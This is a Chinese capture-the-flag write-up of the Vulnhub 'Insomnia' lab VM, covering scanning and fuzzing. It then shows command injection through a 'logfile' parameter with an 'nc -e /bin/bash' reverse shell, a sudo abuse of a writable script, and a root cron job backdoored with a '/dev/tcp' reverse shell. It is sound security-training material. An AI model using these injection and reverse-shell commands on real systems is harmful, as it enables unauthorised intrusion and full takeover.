首页 > 其他分享 >Vulnhub之Insomnia靶机详细解题估计出

Vulnhub之Insomnia靶机详细解题估计出

时间:2022-11-25 20:12:44浏览次数:45  
标签:8080 kali 192.168 Insomnia julia Vulnhub 56.220 var 靶机

Insomnia

作者: jason_huawen

靶机基本信息

名称:Insomnia: 1

地址:

https://www.vulnhub.com/entry/insomnia-1,644/

识别目标主机IP地址

                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.72.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:51:64:78      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.220  08:00:27:cc:a0:fd      1      60  PCS Systemtechnik GmbH          

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.220

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 04:12 EST
Nmap scan report for bogon (192.168.56.220)
Host is up (0.00013s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
8080/tcp open  http    PHP cli server 5.5 or later (PHP 7.3.19-1)
|_http-title: Chat
MAC Address: 08:00:27:CC:A0:FD (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds

NMAP扫描结果表明目标主机有1个开放端口8080(HTTP)

Get Access

访问目标主机的8080端口,但是似乎这个应用运行有问题,不能正常提交数据,查看页面源代码,发现缺少"submit"元素,所以无法正常提交数据。

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    
    <title>Chat</title>
    
    <link rel="stylesheet" href="style.css" type="text/css" />
    
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
    <script type="text/javascript" src="chat.js"></script>
    <script type="text/javascript">
    
        // ask user for name with popup prompt    
        var name = prompt("Enter your nickname:", "guest");
        
        // default name is 'Guest'
        if (!name || name === ' ') {
           name = "guest";
        }
    
        // strip tags
        name = name.replace(/(<([^>]+)>)/ig,"");
    
        // display name on page
        $("#name-area").html("You are: <span>" + name + "</span>");
    
        // kick off chat
        var chat =  new Chat();
        $(function() {
    
                 chat.getState(); 
                 
                 // watch textarea for key presses
             $("#sendie").keydown(function(event) {  
             
                 var key = event.which;  
           
                 //all keys including return.  
                 if (key >= 33) {
                   
                     var maxLength = $(this).attr("maxlength");  
                     var length = this.value.length;  
                     
                     // don't allow new content if length is maxed out
                     if (length >= maxLength) {  
                         event.preventDefault();  
                     }  
                  }  
                                                                                                                             });
                 // watch textarea for release of key press
                 $('#sendie').keyup(function(e) {
                                                         
                          if (e.keyCode == 13) { 
                          
                    var text = $(this).val();
                                var maxLength = $(this).attr("maxlength");  
                    var length = text.length; 
                     
                    // send 
                    if (length <= maxLength + 1) { 
                     
                                chat.send(text, name);
                                $(this).val("");
                                
                    } else {
                    
                                        $(this).val(text.substring(0, maxLength));
    
                                }
    
    
                          }
             });
            
        });
    </script>

</head>

<body onl oad="setInterval('chat.update()', 1000)">

    <div id="page-wrap">
    
        <h2>Insomnia Chat</h2>
        
        <p id="name-area"></p>
        
        <div id="chat-wrap"><div id="chat-area"></div></div>
        
        <form id="send-message-area">
            <h2>Your message</h2>
            <textarea id="sendie" maxlength = '300' ></textarea>
        </form>
    
    </div>

</body>

</html>
                                         
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/robots.txt
<!doctype html><html><head><title>404 Not Found</title><style>
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
</style>
</head><body><h1>Not Found</h1><p>The requested resource <code class="url">/robots.txt</code> was not found on this server.</p></body></html>                                                                                                                              

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ nikto -h http://192.168.56.220:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.220
+ Target Hostname:    192.168.56.220
+ Target Port:        8080
+ Start Time:         2022-11-25 04:18:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.19-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF:  Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2022-11-25 04:19:02 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

似乎有命令执行漏洞,暂时先搁置,先扫描一下有无可利用的目录或者文件。

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ gobuster dir -u http://192.168.56.220:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.220:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/25 05:46:49 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.220:8080/8d9d8218-6616-4d06-9215-7f99b4b82f9f => 200 (Length: 2899). To continue please exclude the status code or the length

运行gobuster似乎出错,要加上选项exclude

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ gobuster dir -u http://192.168.56.220:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 2899 -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.220:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          2899
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,txt,php,html
[+] Timeout:                 10s
===============================================================
2022/11/25 05:49:31 Starting gobuster in directory enumeration mode
===============================================================
/start.sh             (Status: 200) [Size: 20]
/administration.php   (Status: 200) [Size: 65]
/process.php          (Status: 200) [Size: 2]
Progress: 1102039 / 1102805 (99.93%)===============================================================
2022/11/25 05:57:30 Finished
===============================================================

这次扫描出来3个文件,分别访问这些文件:

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ cat start.sh  
php -S 0.0.0.0:8080
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/start.sh
php -S 0.0.0.0:8080
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php
You are not allowed to view : <br>Your activity has been logged

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/process.php       
[]                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ 

只有/administration.php有价值,而且从返回的页面内容看似乎有本地文件包含漏洞,那先FUZZ一下是什么参数?

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ wfuzz -c -u http://192.168.56.220:8080/administration.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 65
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.220:8080/administration.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000002506:   200        2 L      12 W       93 Ch       "logfile"                                                    

Total time: 0
Processed Requests: 4713
Filtered Requests: 4712
Requests/sec.: 0

这里如果用hw作为过滤参数,会扫描不出来这个参数。但是利用这个参数访问文件/etc/passwd,并不是输出内容,而是输出:

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=../../../../../../etc/passwd
You are not allowed to view : ../../../../../../etc/passwd<br>Your activity has been logged

尝试执行命令(组合命令)

──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=whoami                      
You are not allowed to view : whoami<br>Your activity has been logged

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=chat.txt;whoami


kali
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;whoami
You are not allowed to view : /etc/passwd<br>Your activity has been logged

kali
              
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;nc -e /bin/bash 192.168.56.206 5555 
You are not allowed to view : /etc/passwd<br>Your activity has been logged

在Kali Linxu上成功得到了目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.206] 56302
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)

这里需要特别注意,用curl命令去访问下面的链接,虽然Kali Linux可以得到反弹回来的shell,但是当将该shell稳定化,即执行python -c 'import pty;pty.spawn("/bin/bash")'时就无缘无故的就断开链接,而用浏览器访问下面的链接就没有问题

http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;nc%20-e%20/bin/bash%20192.168.56.206%205555
www-data@insomnia:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on insomnia:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on insomnia:
    (julia) NOPASSWD: /bin/bash /var/www/html/start.sh
www-data@insomnia:~/html$ ls -alh /var/www/html/start.sh
ls -alh /var/www/html/start.sh
-rwxrwxrwx 1 root root 20 Dec 21  2020 /var/www/html/start.sh
www-data@insomnia:~/html$ cat /var/www/html/start.sh
cat /var/www/html/start.sh
php -S 0.0.0.0:8080

而start.sh文件时可以编辑的,因此可以加一个/bin/bash

www-data@insomnia:~/html$ echo '/bin/bash' >> /var/www/html/start.sh   
echo '/bin/bash' >> /var/www/html/start.sh

执行该脚本应该就可以得到julia用户的shell

www-data@insomnia:~/html$ sudo -u julia /bin/bash /var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh
[Fri Nov 25 06:40:45 2022] Failed to listen on 0.0.0.0:8080 (reason: Address already in use)
julia@insomnia:/var/www/html$ id
id
uid=1000(julia) gid=1000(julia) groups=1000(julia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
julia@insomnia:/var/www/html$ 

julia@insomnia:/var/www/html$ cd /home
cd /home
julia@insomnia:/home$ ls 
ls 
julia
julia@insomnia:/home$ cd julia
cd julia
julia@insomnia:~$ ls -alh
ls -alh
total 32K
drwxrwxr-x 3 julia julia 4.0K Dec 21  2020 .
drwxr-xr-x 3 root  root  4.0K Dec 15  2020 ..
-rw------- 1 julia julia  379 Dec 21  2020 .bash_history
-rw-r--r-- 1 julia julia  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 julia julia 3.5K Nov 30  2020 .bashrc
drwxr-xr-x 3 julia julia 4.0K Dec 21  2020 .local
-rw-r--r-- 1 julia julia  807 Nov 30  2020 .profile
-rw-r--r-- 1 julia julia   86 Dec 15  2020 user.txt
julia@insomnia:~$ cat user.txt
cat user.txt

~~~~~~~~~~~~~\
USER INSOMNIA
~~~~~~~~~~~~~
Flag : [c2e285cb33cecdbeb83d2189e983a8c0]

提权

julia@insomnia:~$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /bin/bash /var/cron/check.sh

发现root会每分钟执行check.sh脚本

julia@insomnia:~$ ls -alh /var/cron/check.sh
ls -alh /var/cron/check.sh
-rwxrwxrwx 1 root root 153 Dec 21  2020 /var/cron/check.sh

完全可以修改check.sh脚本使得spawn出另一个shell,从而得到root权限

julia@insomnia:~$ echo 'bash -i >& /dev/tcp/192.168.56.206/9999 0>&1' >> /var/cron/check.sh
<tcp/192.168.56.206/9999 0>&1' >> /var/cron/check.sh
julia@insomnia:~$ 

┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.220] 59222
bash: cannot set terminal process group (9199): Inappropriate ioctl for device
bash: no job control in this shell
root@insomnia:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@insomnia:~# cd /root
cd /root
root@insomnia:~# ls
ls
root.txt
root@insomnia:~# cat root.txt
cat root.txt

~~~~~~~~~~~~~~~\
ROOTED INSOMNIA
~~~~~~~~~~~~~~~
Flag : [c84baebe0faa2fcdc2f1a4a9f6e2fbfc]

by Alienum with <3
root@insomnia:~# 

成功得到了Root shell.

经验教训:

  1. Gobuster工具如果运行错误,考虑需要加上exclude选项;

  2. Wfuzz的过滤参数在不同情况下可能有不同的结果,有些可能会失败;

  3. 在反弹shell时,有些时候用命令行的curl发起请求会导致生成的shell不稳定。

  4. 有些时候LFI并不一定表现为文件包含,而是命令执行

标签:8080,kali,192.168,Insomnia,julia,Vulnhub,56.220,var,靶机
From: https://www.cnblogs.com/jason-huawen/p/16926229.html

相关文章

  • VulnHub靶机渗透实战9-vikings
    ​本次靶机是CTF风格的靶机。靶场地址:Vikings:1~VulnHub 网络呢还是桥接模式。 DescriptionBacktotheTopACTFmachinewithfullofchallengesDowhatis......
  • Vulnhub之Ino靶机详细解题过程
    Ino作者:jason_huawen靶机基本信息名称:INO:1.0.1地址:https://www.vulnhub.com/entry/ino-101,601/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Ino]└─$sudo......
  • Vulnhub之ICMP靶机详细解题过程
    ICMP作者:jason_huawen靶机基本信息名称:ICMP:1地址:https://www.vulnhub.com/entry/icmp-1,633/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub]└─$sudonetdisc......
  • Vulnhub之Hacksudo LPE靶机详细解题过程
    HacksudoLPE作者:Jason_huawen靶机基本信息名称:hacksudo:L.P.E.地址:hacksudo:L.P.E.~VulnHub识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]└─......
  • Vulnhub之Hacksudo Alien靶机解题过程
    HacksudoAlien识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.80.0/16|ScreenV......
  • Vulnhub之Hacksudo 3靶机解题过程
    Hacksudo3识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo3]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.61.0/16|ScreenView:Unique......
  • VulnHub靶场渗透实战8-DarkHole: 2
    靶场地址:DarkHole:2~VulnHubDescriptionBacktotheTopDifficulty:HardThisworksbetterwithVMwareratherthanVirtualBoxHint:Don'twasteyourtimeForB......
  • Vulnhub之Hacksudo ProximaCentaur靶机解题过程
    HacksudoProximaCentaur识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.2.0/16......
  • AWD4-如何指定靶机的IP地址
    如何指定靶机的ip地址awd比赛中,应该每一台靶机占用一个ip地址,但是我们使用docker的情况下,可以使用桥接网络给容器分配ip地址,但是只支持容器之间的一个访问,不能分配容器与......
  • Vulnhub之Hacksudo FOG靶机解题过程
    HacksudoFOG识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.83.0/16|ScreenVi......